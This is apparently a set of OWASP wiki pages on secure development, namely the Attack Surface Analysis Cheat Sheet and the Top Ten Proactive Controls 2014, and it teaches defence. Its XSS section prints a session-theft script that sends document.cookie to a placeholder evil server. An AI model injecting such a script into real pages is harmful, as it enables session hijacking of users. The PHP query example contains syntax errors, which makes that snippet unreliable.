; A8-Cross-Site Request Forgery (CSRF) <br />
; A9-Using Components with Known Vulnerabilities<br />
; A10-Unvalidated Redirects and Forwards<br />
</font> <br />
<br />
|- valign="top"<br />
| width=“50%” style="border: 1.00pt solid #000001; padding: 0.18cm" | <br />
'''OWASP-C9: Include Security-Specific Requirements'''<br />
<br />
<font size="2" style="font-size: 9pt">Is important to consider security requirements from early stages of software development lifecycle. <br />
There are two types of security requirements: <br />
* Functional Requirements ( Visible and QA testable feature in the application )<br />
* Non-functional requirements (Invisible/non-testable by QA staff<br />
</font><br />
<br />
<font size="2" style="font-size: 9pt">Security Requirements include:<br />
* Confidentiality requirements<br />
* Integrity requirements<br />
* Authentication & authorization requirements<br />
* Auditing and logging requirements<br />
* Session management requirements <br />
* Errors and exception management requirements<br />
* Configuration parameters requirements <br />
* Archiving requirements <br />
* Legal and Compliance Constraints<br />
</font><br />
<br />
| width=“50%” style="border: 1.00pt solid #000001; padding: 0.18cm" | <br />
<font size="2" style="font-size: 9pt"><br />
;1 Earn or give, but never assume, trust<br />
<br />
;2 Use an authentication mechanism that cannot be bypassed or tampered with<br />
<br />
;3 Authorize after you authenticate<br />
<br />
;4 Strictly separate data and control instructions, and never process control instructions received from untrusted sources<br />
<br />
;5 Define an approach that ensures all data are explicitly validated<br />
<br />
;6 Use cryptography correctly<br />
<br />
;7 Identify sensitive data and how they should be handled <br />
<br />
;8 Always consider the users <br />
<br />
;9 Understand how integrating external components changes your attack surface <br />
<br />
;10 Be flexible when considering future changes to objects and actors<br />
<br />
</font><br />
<br />
| width=“50%” style="border: 1.00pt solid #000001; padding: 0.18cm" | '''Prevents:''' <br />
<font size="2" style="font-size: 9pt"><br />
; A1-Injection<br />
; A2-Broken Authentication and Session Management<br />
; A3 XSS<br />
; A4-Insecure Direct Object References<br />
; A5-Security Misconfiguration<br />
; A6-Sensitive Data Exposure<br />
; A7-Missing Function Level Access Control<br />
; A8-Cross-Site Request Forgery (CSRF) <br />
; A9-Using Components with Known Vulnerabilities<br />
; A10-Unvalidated Redirects and Forwards<br />
</font> <br />
<br />
|- valign="top"<br />
| width=“50%” style="border: 1.00pt solid #000001; padding: 0.18cm" | '''OWASP-C10:Design and Architect Security In'''<br />
<br />
<font size="2" style="font-size: 9pt">Design considerations :<br />
* Confidentiality<br />
* Availability<br />
* Authentication<br />
* Auditing/Logging <br />
* Least privilege <br />
* Separation of duties <br />
* Defence of depth <br />
* Fail secure <br />
</font><br />
| width=“50%” style="border: 1.00pt solid #000001; padding: 0.18cm" | <br />
<font size="2" style="font-size: 9pt"><br />
;1 Earn or give, but never assume, trust<br />
<br />
;2 Use an authentication mechanism that cannot be bypassed or tampered with<br />
<br />
;3 Authorize after you authenticate<br />
<br />
;4 Strictly separate data and control instructions, and never process control instructions received from untrusted sources<br />
<br />
;5 Define an approach that ensures all data are explicitly validated<br />
<br />
;6 Use cryptography correctly<br />
<br />
;7 Identify sensitive data and how they should be handled <br />
<br />
;8 Always consider the users <br />
<br />
;9 Understand how integrating external components changes your attack surface <br />
<br />
;10 Be flexible when considering future changes to objects and actors<br />
<br />
</font><br />
<br />
<br />
| width=“50%” style="border: 1.00pt solid #000001; padding: 0.18cm" | '''Prevents:''' <br />
<font size="2" style="font-size: 9pt"><br />
; A1-Injection<br />
; A2-Broken Authentication and Session Management<br />
; A3 XSS<br />
; A4-Insecure Direct Object References<br />
; A5-Security Misconfiguration<br />
; A6-Sensitive Data Exposure<br />
; A7-Missing Function Level Access Control<br />
; A8-Cross-Site Request Forgery (CSRF) <br />
; A9-Using Components with Known Vulnerabilities<br />
; A10-Unvalidated Redirects and Forwards<br />
</font> <br />
|}<br />
<br />
[[File:Mapping -OWASP Top 10 ProactiveControls - Top 10 Risks.png]]<br />
<br />
= Project Roadmap =<br />
<br />
Welcome to the OWASP Top 10 Proactive Controls Project! <br />
<br />
== Roadmap ==<br />
<br />
Project rewrite (version 2) end of 2015<br />
<br />
== Status ==<br />
<br />
March 10, 2014: We released an early beta of this document to the OWASP leaders list for review and commentary.<br/><br />
February 3, 2014: We are currently working towards a beta release of this document and have begun working with a designer for the final release PDF.<br />
<br />
__NOTOC__ <headertabs /><br />
<br />
[[Category:OWASP_Project|OWASP Proactive Controls]] [[Category:OWASP_Builders]] [[Category:OWASP_Defenders]] [[Category:OWASP_Document]]</div>Jim Birdhttps://wiki.owasp.org/index.php?title=Attack_Surface_Analysis_Cheat_Sheet&diff=178979Attack Surface Analysis Cheat Sheet2014-07-18T15:46:48Z<p>Jim Bird: </p>
<hr />
<div> __NOTOC__<br />
<div style="width:100%;height:160px;border:0,margin:0;overflow: hidden;">[[File:Cheatsheets-header.jpg|link=]]</div><br />
<br />
{| style="padding: 0;margin:0;margin-top:10px;text-align:left;" |-<br />
| valign="top" style="border-right: 1px dotted gray;padding-right:25px;" |<br />
<br />
Last revision (mm/dd/yy): '''{{REVISIONMONTH}}/{{REVISIONDAY}}/{{REVISIONYEAR}}''' <br />
= What is Attack Surface Analysis and Why is it Important? =<br />
__TOC__{{TOC hidden}}<br />
<br />
This article describes a simple and pragmatic way of doing Attack Surface Analysis and managing an application's Attack Surface. It is targeted to be used by developers to understand and manage application security risks as they design and change an application, as well as by application security specialists doing a security risk assessment. The focus here is on protecting an application from external attack - it does not take into account attacks on the users or operators of the system (e.g. malware injection, social engineering attacks), and there is less focus on insider threats, although the principles remain the same. The internal attack surface is likely to be different to the external attack surface and some users may have a lot of access.<br />
<br />
Attack Surface Analysis is about mapping out what parts of a system need to be reviewed and tested for security vulnerabilities. The point of Attack Surface Analysis is to understand the risk areas in an application, to make developers and security specialists aware of what parts of the application are open to attack, to find ways of minimizing this, and to notice when and how the Attack Surface changes and what this means from a risk perspective.<br />
<br />
Attack Surface Analysis is usually done by security architects and pen testers. But developers should understand and monitor the Attack Surface as they design and build and change a system.<br />
<br />
Attack Surface Analysis helps you to:<br />
# identify what functions and what parts of the system you need to review/test for security vulnerabilities<br />
# identify high risk areas of code that require defense-in-depth protection - what parts of the system that you need to defend<br />
# identify when you have changed the attack surface and need to do some kind of threat assessment<br />
<br />
= Defining the Attack Surface of an Application =<br />
<br />
The Attack Surface describes all of the different points where an attacker could get into a system, and where they could get data out.<br />
<br />
The Attack Surface of an application is:<br />
# the sum of all paths for data/commands into and out of the application, and <br />
# the code that protects these paths (including resource connection and authentication, authorization, activity logging, data validation and encoding), and <br />
# all valuable data used in the application, including secrets and keys, intellectual property, critical business data, personal data and PII, and <br />
# the code that protects these data (including encryption and checksums, access auditing, and data integrity and operational security controls).<br />
<br />
You overlay this model with the different types of users - roles, privilege levels - that can access the system (whether authorized or not). Complexity increases with the number of different types of users. But it is important to focus especially on the two extremes: unauthenticated, anonymous users and highly privileged admin users (e.g. database administrators, system administrators). <br />
<br />
Group each type of attack point into buckets based on risk (external-facing or internal-facing), purpose, implementation, design and technology. You can then count the number of attack points of each type, then choose some cases for each type, and focus your review/assessment on those cases.<br />
<br />
With this approach, you don't need to understand every endpoint in order to understand the Attack Surface and the potential risk profile of a system. Instead, you can count the different general type of endpoints and the number of points of each type. With this you can budget what it will take to assess risk at scale, and you can tell when the risk profile of an application has significantly changed.<br />
<br />
= Identifying and Mapping the Attack Surface =<br />
<br />
You can start building a baseline description of the Attack Surface in a picture and notes. Spend a few hours reviewing design and architecture documents from an attacker's perspective. Read through the source code and identify different points of entry/exit:<br />
* User interface (UI) forms and fields<br />
* HTTP headers and cookies<br />
* APIs<br />
* Files<br />
* Databases<br />
* Other local storage<br />
* Email or other kinds of messages<br />
* Run-time arguments<br />
* …. [your points of entry/exit]<br />
<br />
The total number of different attack points can easily add up into the thousands or more. To make this manageable, break the model into different types based on function, design and technology:<br />
* Login/authentication entry points<br />
* Admin interfaces<br />
* Inquiries and search functions<br />
* Data entry (CRUD) forms<br />
* Business workflows<br />
* Transactional interfaces/APIs<br />
* Operational command and monitoring interfaces/APIs<br />
* Interfaces with other applications/systems<br />
* ... [your types]<br />
<br />
You also need to identify the valuable data (e.g. confidential, sensitive, regulated) in the application, by interviewing developers and users of the system, and again by reviewing the source code. <br />
<br />
You can also build up a picture of the Attack Surface by scanning the application. For web apps you can use a tool like the [[OWASP_Zed_Attack_Proxy_Project]] or [http://arachni-scanner.com/ Arachni] or [http://code.google.com/p/skipfish/ Skipfish] or [http://w3af.sourceforge.net/ w3af] or one of the many commercial dynamic testing and vulnerability scanning tools or services to crawl your app and map the parts of the application that are accessible over the web. Some web application firewalls (WAFs) may also be able to export a model of the appliaction's entry points.<br />
<br />
Validate and fill in your understanding of the Attack Surface by walking through some of the main use cases in the system: signing up and creating a user profile, logging in, searching for an item, placing an order, changing an order, and so on. Follow the flow of control and data through the system, see how information is validated and where it is stored, what resources are touched and what other systems are involved. There is a recursive relationship between Attack Surface Analysis and [[Application Threat Modeling]]: changes to the Attack Surface should trigger threat modeling, and threat modeling helps you to understand the Attack Surface of the application.<br />
<br />
The Attack Surface model may be rough and incomplete to start, especially if you haven’t done any security work on the application before. Fill in the holes as you dig deeper in a security analysis, or as you work more with the application and realize that your understanding of the Attack Surface has improved.<br />
<br />
= Measuring and Assessing the Attack Surface =<br />
<br />
Once you have a map of the Attack Surface, identify the high risk areas. Focus on remote entry points – interfaces with outside systems and to the Internet – and especially where the system allows anonymous, public access. <br />
* Network-facing, especially internet-facing code<br />
* Web forms<br />
* Files from outside of the network<br />
* Backwards compatible interfaces with other systems – old protocols, sometimes old code and libraries, hard to maintain and test multiple versions<br />
* Custom APIs – protocols etc – likely to have mistakes in design and implementation<br />
* Security code: anything to do with cryptography, authentication, authorization (access control) and session management<br />
<br />
These are often where you are most exposed to attack. Then understand what compensating controls you have in place, operational controls like network firewalls and application firewalls, and intrusion detection or prevention systems to help protect your application.<br />
<br />
Michael Howard at Microsoft and other researchers have developed a method for measuring the Attack Surface of an application, and to track changes to the Attack Surface over time, called the [http://www.cs.cmu.edu/~wing/publications/Howard-Wing03.pdf Relative Attack Surface Quotient (RSQ)]. Using this method you calculate an overall attack surface score for the system, and measure this score as changes are made to the system and to how it is deployed. Researchers at Carnegie Mellon built on this work to develop a formal way to calculate an [http://www.cs.cmu.edu/~pratyus/tse10.pdf Attack Surface Metric] for large systems like SAP. They calculate the Attack Surface as the sum of all entry and exit points, channels (the different ways that clients or external systems connect to the system, including TCP/UDP ports, RPC end points, named pipes...) and untrusted data elements. Then they apply a damage potential/effort ratio to these Attack Surface elements to identify high-risk areas.<br />
<br />
Note that deploying multiple versions of an application, leaving features in that are no longer used just in case they may be needed in the future, or leaving old backup copies and unused code increases the Attack Surface. Source code control and robust change management/configurations practices should be used to ensure the actual deployed Attack Surface matches the theoretical one as closely as possible.<br />
<br />
Backups of code and data - online, and on offline media - are an important but often ignored part of a system's Attack Surface. Protecting your data and IP by writing secure software and hardening the infrastructure will all be wasted if you hand everything over to bad guys by not protecting your backups.<br />
<br />
= Managing the Attack Surface =<br />
<br />
Once you have a baseline understanding of the Attack Surface, you can use it to incrementally identify and manage risks going forward as you make changes to the application. Ask yourself:<br />
* What has changed? <br />
* What are you doing different? (technology, new approach, ….)<br />
* What holes could you have opened?<br />
<br />
The first web page that you create opens up the system’s Attack Surface significantly and introduces all kinds of new risks. If you add another field to that page, or another web page like it, while technically you have made the Attack Surface bigger, you haven’t increased the risk profile of the application in a meaningful way. Each of these incremental changes is more of the same, unless you follow a new design or use a new framework.<br />
<br />
If you add another web page that follows the same design and using the same technology as existing web pages, it's easy to understand how much security testing and review it needs. If you add a new web services API or file that can be uploaded from the Internet, each of these changes have a different risk profile again - see if if the change fits in an existing bucket, see if the existing controls and protections apply. If you're adding something that doesn't fall into an existing bucket, this means that you have to go through a more thorough risk assessment to understand what kind of security holes you may open and what protections you need to put in place. <br />
<br />
Changes to session management, authentication and password management directly affect the Attack Surface and need to be reviewed. So do changes to authorization and access control logic, especially adding or changing role definitions, adding admin users or admin functions with high privileges. Similarly for changes to the code that handles encryption and secrets. Fundamental changes to how data validation is done. And major architectural changes to layering and trust relationships, or fundamental changes in technical architecture – swapping out your web server or database platform, or changing the run-time operating system. <br />
<br />
As you add new user types or roles or privilege levels, you do the same kind of analysis and risk assessment. Overlay the type of access across the data and functions and look for problems and inconsistencies. It's important to understand the access model for the application, whether it is positive (access is deny by default) or negative (access is allow by default). In a positive access model, any mistakes in defining what data or functions are permitted to a new user type or role are easy to see. In a negative access model,you have to be much more careful to ensure that a user does not get access to data/functions that they should not be permitted to.<br />
<br />
This kind of threat or risk assessment can be done periodically, or as a part of design work in serial / phased / spiral / waterfall development projects, or continuously and incrementally in Agile / iterative development.<br />
<br />
Normally, an application's Attack Surface will increase over time as you add more interfaces and user types and integrate with other systems. You also want to look for ways to reduce the size of the Attack Surface when you can by simplifying the model (reducing the number of user levels for example or not storing confidential data that you don't absolutely have to), turning off features and interfaces that aren't being used, by introducing operational controls such as a Web Application Firewall (WAF) and real-time application-specific attack detection.<br />
<br />
= Related Articles =<br />
<br />
OWASP CLASP Identifying the Attack Surface: [[Identify attack surface]]<br />
<br><br />
OWASP Principles Minimize Attack Surface area: [[Minimize attack surface area]]<br />
<br><br />
Mitigate Security Risks by Minimizing the Code You Expose to Untrusted Users, Michael Howard http://msdn.microsoft.com/en-us/magazine/cc163882.aspx<br />
<br />
= Authors and Primary Editors =<br />
<br />
Jim Bird - jimbird[at]shaw.ca<br />
<br><br />
Jim Manico - jim[at]owasp.org<br />
| valign="top" style="padding-left:25px;width:300px;border-right: 1px dotted gray;padding-right:25px;" |<br />
<br />
== Other Cheatsheets ==<br />
<br />
{{Cheatsheet_Navigation_Body}}<br />
<br />
|}<br />
<br />
[[Category:Cheatsheets]]</div>Jim Birdhttps://wiki.owasp.org/index.php?title=OWASP_Proactive_Controls&diff=177393OWASP Proactive Controls2014-06-23T15:15:18Z<p>Jim Bird: </p>
<hr />
<div>= Main = <br />
<div style="width:100%;height:160px;border:0,margin:0;overflow: hidden;">[[File:Proactive-header.jpg|link=]]</div><br />
<br />
{| style="padding: 0;margin:0;margin-top:10px;text-align:left;" |-<br />
| valign="top" style="border-right: 1px dotted gray;padding-right:25px;" |<br />
<br />
== OWASP Proactive Controls ==<br />
<br />
Software developers are the foundation of any application. In order to achieve secure software, developers must be supported and helped by the organization they author code for. As software developers author the code that makes up a web application, they need to embrace and practice a wide variety of secure coding techniques. All tiers of a web application, the user interface, the business logic, the controller, the database code and more – all need to be developed with security in mind. This can be a very difficult task and developers are often set up for failure. Most developers did not learn about secure coding or crypto in school. The languages and frameworks that developers use to build web applications are often lacking critical core controls or are insecure by default in some way. It is also very rare when organizations provide developers with prescriptive requirements that guide them down the path of secure software. And even when they do, there may be inherent flaws in requirements and designs. When it comes to web security, developers are often set up to lose the security game.<br />
<br />
The OWASP Top Ten Proactive Controls is a list of security techniques that should be included in every software development project. This document was written by developers for developers to assist those new to secure development.<br />
<br />
* 1: Parameterize Queries<br />
* 2: Encode Data<br />
* 3: Validate All Inputs<br />
* 4: Implement Appropriate Access Controls<br />
* 5: Establish Identity and Authentication Controls<br />
* 6: Protect Data and Privacy<br />
* 7: Implement Logging, Error Handling and Intrusion Detection<br />
* 8: Leverage Security Features of Frameworks and Security Libraries<br />
* 9: Include Security-Specific Requirements<br />
* 10: Design and Architect Security In<br />
<br />
For more information, see the complete document in the tab to the right.<br />
<br />
==Licensing==<br />
<br />
The OWASP Proactive Controls document is free to use under the [https://creativecommons.org/licenses/by-sa/3.0/us/ Creative Commons ShareAlike 3 License].<br />
<br />
| valign="top" style="padding-left:25px;width:200px;border-right: 1px dotted gray;padding-right:25px;" |<br />
<br />
== What is This? ==<br />
<br />
The OWASP Top Ten Proactive Controls describes the top control and control categories that every architect and developer should absolutely, 100% include in every project.<br />
<br />
== Project Leaders ==<br />
<br />
* [https://www.owasp.org/index.php/User:Jmanico Jim Manico] [mailto:jim.manico@owasp.org @]<br />
* [https://www.owasp.org/index.php/User:Jim_Bird Jim Bird] [mailto:jimbird@shaw.ca @]<br />
<br />
== Key Contributors ==<br />
<br />
* Danny Harris [mailto:danny.harris@owasp.org @]<br />
* Stephen de Vries<br />
* Andrew Van Der Stock<br />
* Gaz Heyes<br />
* Colin Watson<br />
<br />
== Related Projects ==<br />
<br />
* [[OWASP Top Ten Project]]<br />
* [[OWASP Mobile Security Project]]<br />
* [[Cheat Sheets]]<br />
<br />
| valign="top" style="padding-left:25px;width:200px;" |<br />
<br />
== Quick Access ==<br />
<br />
* Top Ten Proactive Controls 2014 [https://www.owasp.org/index.php/OWASP_Proactive_Controls#tab=OWASP_Top_Ten_Proactive_Controls full description].<br />
<br />
== News and Events ==<br />
* [10 Mar 2014] [http://lists.owasp.org/pipermail/owasp-leaders/2014-March/011047.html Request for review]<br />
* [04 Feb 2014] New Wiki Template!<br />
<br />
== Mailing List ==<br />
<br />
Keep up-to-date via the [https://lists.owasp.org/mailman/listinfo/owasp_proactive_controls Project Email List].<br />
<br />
==Classifications==<br />
<br />
{| width="200" cellpadding="2"<br />
|-<br />
| align="center" valign="top" width="50%" rowspan="2"| [[File:Owasp-incubator-trans-85.png|link=https://www.owasp.org/index.php/OWASP_Project_Stages#tab=Incubator_Projects]]<br />
| align="center" valign="top" width="50%"| [[File:Owasp-builders-small.png|link=]] <br />
|-<br />
| align="center" valign="top" width="50%"| [[File:Owasp-defenders-small.png|link=]]<br />
|-<br />
| colspan="2" align="center" | [[File:Cc-button-y-sa-small.png|link=http://creativecommons.org/licenses/by-sa/3.0/]]<br />
|-<br />
| colspan="2" align="center" | [[File:Project_Type_Files_DOC.jpg|link=]]<br />
|}<br />
<br />
|}<br />
<br />
= OWASP Top Ten Proactive Controls =<br />
<br />
Software developers are the foundation of any application. In order to achieve secure software, developers must be supported and helped by the organization they author code for. As software developers author the code that makes up a web application, they need to embrace and practice a wide variety of secure coding techniques. All tiers of a web application, the user interface, the business logic, the controller, the database code and more – all need to be developed with security in mind. This can be a very difficult task and developers are often set up for failure. Most developers did not learn about secure coding or crypto in school. The languages and frameworks that developers use to build web applications are often lacking critical core controls or are insecure by default in some way. There may be inherent flaws in requirements and designs. It is also very rare when organizations provide developers with prescriptive requirements that guide them down the path of secure software. When it comes to web security, developers are often set up to lose the security game. <br />
<br />
This document was written by developers for developers, to assist those new to secure development. It aims to guide developers and other software development professionals down the path of secure web application software development.<br />
<br />
There are more than 10 issues that developers need to be aware of. Some of these “top ten” controls will be very specific, others will be general categories. Some of these items are technical, others are process based. Some may argue that this document includes items that are not even controls at all. All of these concerns are fair. Again, this is an awareness document meant for those new to secure software development. It is a start, not an end.<br />
<br />
The number of people who influenced or contributed to this document in some way is to numerous to mentioned. I would also like to thank the entire [[Cheat Sheets]] series team whose content has been pulled from liberally for this document. <br />
<br />
Introducing the OWASP Top Ten Proactive Controls 2014. <br />
<br />
<br />
== 1: Parameterize Queries ==<br />
<br />
SQL Injection is one of the most dangerous web application risks due to the fact that SQL Injection is both easy to exploit and can deliver an impact to your application that is devastating.<br />
<br />
The simple insertion of malicious SQL code into your web application – and the entire database could potentially be stolen, wiped, modified. The web application can even be used to run dangerous operating system commands against the operating system hosting your database. <br />
<br />
To stop SQL injection, developers must prevent untrusted input from being interpreted as part of a SQL command. The best way to do this is with the programming technique known as Query Parameterization.<br />
<br />
Here is an example of Query Parameterization in Java:<br />
<br />
String newName = request.getParameter("newName");<br />
String id = request.getParameter("id");<br />
PreparedStatement pstmt = con.prepareStatement("UPDATE EMPLOYEES SET NAME = ? WHERE ID = ?"); <br />
pstmt.setString(1, newName); <br />
pstmt.setString(2, id);<br />
<br />
Here is an example of query parameterization in PHP:<br />
<br />
$email = $_REQUEST[‘email’];<br />
$ id’= $_REQUEST[‘id’];<br />
$stmt = $dbh->prepare(”update users set email=:new_email where id=:user_id”); <br />
$stmt->bindParam(':new_email', $email);<br />
$stmt->bindParam(':user_id', $id);<br />
<br />
'''Key References'''<br />
* [[Query Parameterization Cheat Sheet]]<br />
* [https://www.owasp.org/index.php/OWASP_Secure_Coding_Practices_-_Quick_Reference_Guide OWASP Secure Coding Practices Quick Reference Guide]<br />
<br />
<br />
== 2: Encode Data ==<br />
<br />
Encoding is a powerful mechanism to help protect against many types of attack, especially injection attacks. Essentially, encoding involves translating special characters into some equivalent that is no longer significant in the target interpreter. A specific example of encoding is output encoding necessary to prevent Cross Site Scripting. <br />
<br />
Web developers often build web pages dynamically, consisting of a mix of developer built HTML/JavaScript and database data that was originally populated with user input. This input should be considered to be untrusted data and dangerous, which requires special handling when building a secure web application. Cross Site Scripting (XSS) or, to give it its proper definition, JavaScript injection, occurs when an attacker tricks your users into executing malicious JavaScript that was not originally built into your website. XSS attacks execute in the user's browser and can have a wide variety of effects. <br />
<br />
For example:<br />
<br />
XSS site defacement:<br />
<br />
<script>document.body.innerHTML(“Jim was here”);</script><br />
<br />
XSS session theft:<br />
<br />
<script><br />
var img = new Image();<br />
img.src=&quot;hxxp://<some evil server>.com?” + document.cookie;<br />
</script><br />
<br />
Persistent XSS (or Stored XSS) occurs when an XSS attack can be embedded in a website database or filesystem. This flavor of XSS is more dangerous because users will already be logged into the site when the attack is executed. Reflected XSS occurs when the attacker places an XSS attack at the end of a URL and tricks a victim into visiting that URL. When a victim visits this URL, the XSS attack is launched. This type of XSS is less dangerous since the victim needs to be tricked into visiting the dangerous link and must already be logged into the site.<br />
<br />
Contextual output encoding is a crucial programming technique needed to stop XSS. This is performed on output, when you’re building a user interface, at the last moment before untrusted data is dynamically added to HTML. Forms of encoding needing to stop XSS include HTML Entity Encoding, JavaScript Encoding and Percent Encoding (aka URL Encoding). Encoding needed to stop other forms of injection include Unix encoding, Windows encoding, LDAP encoding, XML encoding and others. OWASP's Enterprise Security API (ESAPI) provides encoders for these functions in Java. In .NET 4.5, the [http://msdn.microsoft.com/en-us/library/system.web.security.antixss.antixssencoder%28v=vs.110%29.aspx AntiXssEncoder Class] provides CSS, HTML, URL, JavaScriptString and XML encoders - other encoders for LDAP and VBScript are included in the open source AntiXSS library.<br />
<br />
'''Key References'''<br />
* Stopping XSS in your web application: OWASP [[XSS (Cross Site Scripting) Prevention Cheat Sheet]]<br />
* General information about injection: [[Top 10 2013-A1-Injection]]<br />
<br />
'''Key Tools'''<br />
* [https://www.owasp.org/index.php/OWASP_Java_Encoder_Project OWASP Java Encoder Project]<br />
* [http://msdn.microsoft.com/en-us/security/aa973814.aspx Microsoft .NET AntiXSS Library]<br />
* [https://www.owasp.org/index.php/Category:OWASP_Enterprise_Security_API OWASP ESAPI]<br />
* [https://www.owasp.org/index.php/OWASP_Encoder_Comparison_Reference_Project OWASP Encoder Comparison Reference Project]<br />
<br />
<br />
== 3: Validate All Inputs ==<br />
<br />
It is critical to treat all input from outside of the application (for example, from browsers or mobile clients, from outside systems or files) as untrusted. For web applications this includes HTTP headers, cookies, and GET and POST parameters: any or all of this data could be compromised by an attacker.<br />
<br />
One of the most important ways to build a secure web application is to limit what input a user is allowed to submit to your web application. Limiting user input is a technique called “input validation”. Input validation is most often built into web applications in server-side code using regular expressions. Regular expressions are a kind of code syntax that can help tell if a string matches a certain pattern. Secure programmers can use regular expressions to help define what good user input should look like.<br />
<br />
There are two types of input validation: “white list" validation and "black list" validation. White list validation seeks to define what good input should look like. Any input that does not meet this “good input” definition should be rejected. “Black list” validation seeks to detect known attacks and only reject those attacks or bad characters. “Black list” validation is much more difficult to build into your applications effectively because it can be bypassed through encoding and other obfuscation techniques, and is not recommended when building a secure web application. The following examples will focus on white list validation examples.<br />
<br />
When a user first registers for an account with our web application, some of the first things we ask a user to provide for us would be a username, password and email address. If this input came from a malicious user, the input could contain dangerous attacks that could harm our web application! One of the ways we can make attacking this web application more difficult is to use regular expressions to validate the user input from this form.<br />
<br />
Let’s start with the following regular expression for the username. <br />
<br />
^[a-z0-9_]{3,16}$<br />
<br />
This regular expression input validation white list of good characters only allows lowercase letters, numbers and the underscore character. The size of the username is also being limited to 3-16 characters in this example. <br />
<br />
Here is an example regular expression for the password field.<br />
<br />
^(?=.*[a-z])(?=.*[A-Z]) (?=.*\d) (?=.*[@#$%]).{10,64}$<br />
<br />
This regular expression ensures that a password is 10 to 64 characters in length and includes a uppercase letter, a lowercase letter, a number and a special character (one or more uses of @, #, $, or %).<br />
<br />
Here is an example regular expression for an email address (per the HTML5 specification http://www.w3.org/TR/html5/forms.html#valid-e-mail-address).<br />
<br />
^[a-zA-Z0-9.!#$%&'*+/=?^_`{|}~-]+@[a-zA-Z0-9-]+(?:\.[a-zA-Z0-9-]+)*$<br />
<br />
There are special cases for validation where regular expressions are not enough. If your application handles markup -- untrusted input that is supposed to contain HTML -- it can be very difficult to validate. Encoding is also difficult, since it would break all the tags that are supposed to be in the input. Therefore, you need a library that can parse and clean HTML formatted text such as the [[OWASP Java HTML Sanitizer]]. A regular expression is not the right tool to parse and sanitize untrusted HTML.<br />
<br />
Here we illustrate one of the unfortunate truisms about input validation: input validation does not necessarily make untrusted input “safe” especially when dealing with “open text input” where complete sentences from users need to be accepted.<br />
<br />
'''Key References''' <br />
* [[Input Validation Cheat Sheet]]<br />
<br />
'''Key Tools'''<br />
* [https://www.owasp.org/index.php/OWASP_JSON_Sanitizer OWASP JSON Sanitizer Project]<br />
* [https://www.owasp.org/index.php/OWASP_Java_HTML_Sanitizer OWASP Java HTML Sanitizer Project]<br />
* [http://commons.apache.org/proper/commons-validator/ Apache Commons Validator]<br />
<br />
<br />
== 4: Implement Appropriate Access Controls ==<br />
<br />
Authorization (Access Control) is the process where requests to access a particular feature or resource should be granted or denied. It should be noted that authorization is not equivalent to authentication (verifying identity). These terms and their definitions are frequently confused. <br />
<br />
Access Control can be a rather complex and design-heavy security control. The following "positive" access control design requirements should be considered at the initial stages of application development. Once you have chosen a specific access control design pattern, it is often difficult and time consuming to re-engineer access control in your application with a new pattern. Access Control is one of the main areas of application security software design that must be heavily thought-through up front. <br />
<br />
=== Force all requests to go through access control checks ===<br />
Most frameworks and languages only check a feature for access control if a programmer adds that check. The opposite is a more security-centric design. Consider using a filter or other automatic mechanism to ensure that all requests go through some kind of access control check.<br />
<br />
=== Deny by default ===<br />
In line with automatic access control checking, consider denying all access control checks for features that have not been configured for access control. Normally the opposite is true in that newly created features automatically grant users full access until a developer has added that check. <br />
<br />
=== Avoid hard-coded policy-based access control checks in code ===<br />
Very often, access control policy is hard-coded deep in application code. This makes auditing or proving the security of that software very difficult and time consuming. Access control policy and application code, when possible, should be separated. Another way of saying this is that your enforcement layer (checks in code) and your access control decision making process (the access control "engine") should be separated when possible. <br />
<br />
=== Code to the activity ===<br />
Most web frameworks use role based access control as the primary method for coding enforcement points in code. While it's acceptable to use roles in access control mechanisms, coding specifically to the role in application code is an anti-pattern. Considering checking if the user has access to that feature in code, as opposed to checking what role the user is in code.<br />
<br />
=== Server-side trusted data should drive access control ===<br />
The vast majority of data you need to make an access control decision (who is the user and are they logged in, what entitlements does the user have, what is the access control policy, what feature and data is being requested, what time is it, what geolocation is it, etc) should be retrieved "server-side" in a standard web or web service application. Policy data such as a user's role or an access control rule should never be part of the request. In a standard web application, the only client-side data that is needed for access control is the id or ids of the data being accessed. Most all other data needed to make an access control decision should be retrieved server-side.<br />
<br />
'''Key References'''<br />
* [[Access Control Cheat Sheet]]<br />
<br />
'''Key Tool'''<br />
* [https://www.owasp.org/index.php/OWASP_PHPRBAC_Project OWASP PHPRBAC Project]<br />
* [http://shiro.apache.org/authorization-features.html Apache Shiro Authorization features]<br />
<br />
<br />
== 5: Establish Identity and Authentication Controls ==<br />
<br />
Authentication is the process of verifying that an individual or an entity is who it claims to be. Authentication is commonly performed by submitting a user name or ID and one or more items of private information that only a given user should know.<br />
<br />
Session Management is a process by which a server maintains the state of an entity interacting with it. This is required for a server to remember how to react to subsequent requests throughout a transaction. Sessions are maintained on the server by a session identifier which can be passed back and forward between the client and server when transmitting and receiving requests. Sessions should be unique per user and computationally very difficult to predict.<br />
<br />
Identity management is a broader topic that not only includes authentication and session management, but also covers advanced topics like identity federation, single sign on, password-management tools, identity repositories and more.<br />
<br />
'''Key References'''<br />
* [[Authentication Cheat Sheet]]<br />
* [[Password Storage Cheat Sheet]]<br />
* [[Forgot Password Cheat Sheet]] <br />
* [[Session Management Cheat Sheet]]<br />
<br />
<br />
== 6: Protect Data and Privacy ==<br />
<br />
=== Use Encryption in Transit ===<br />
<br />
When transmitting sensitive data, at any tier of your application or network architecture, encryption-in-transit of some kind should be considered. SSL/TLS is by far the most common and widely supported model used by web applications for encryption in transit. <br />
<br />
'''Key References'''<br />
* Proper SSL/TLS configuration: [[Transport Layer Protection Cheat Sheet]]<br />
* Protecting users from man-in-the-middle attacks via fraudulent SSL certificates: [[Pinning Cheat Sheet]]<br />
<br />
=== Use Encryption at Rest ===<br />
<br />
Cryptographic storage is difficult to build securely. It's critical to classify data in your system and determine that data needs to be encrypted, such as the need to encrypt credit cards per the PCI compliance standard. Also, any time you start building your own low-level crypto on your own, ensure you are or have the assistance of a deep applied crypto expert. Consider well vetted cryptographic libraries such as the [https://code.google.com/p/keyczar/ Google KeyCzar] project. Also, be prepared to handle the more difficult aspects of applied crypto such as key management, overall cryptographic architecture design as well as tiering and trust issues in complex software. <br />
<br />
'''Key References'''<br />
* Information on low level decisions necessary when encrypting data at rest: [[Cryptographic Storage Cheat Sheet]] <br />
* [[Password Storage Cheat Sheet]]<br />
<br />
'''Key Tools'''<br />
* [https://www.owasp.org/index.php/O-Saft OWASP SSL Audit for Testers]<br />
* [https://code.google.com/p/keyczar/ Google KeyCzar]<br />
<br />
=== Implement Protection in Process ===<br />
<br />
Make sure that confidential or sensitive data is not exposed by accident during processing. It may be more accessible in memory; it may be stored in temporary locations or in logs.<br />
<br />
<br />
== 7: Implement Logging and Intrusion Detection ==<br />
<br />
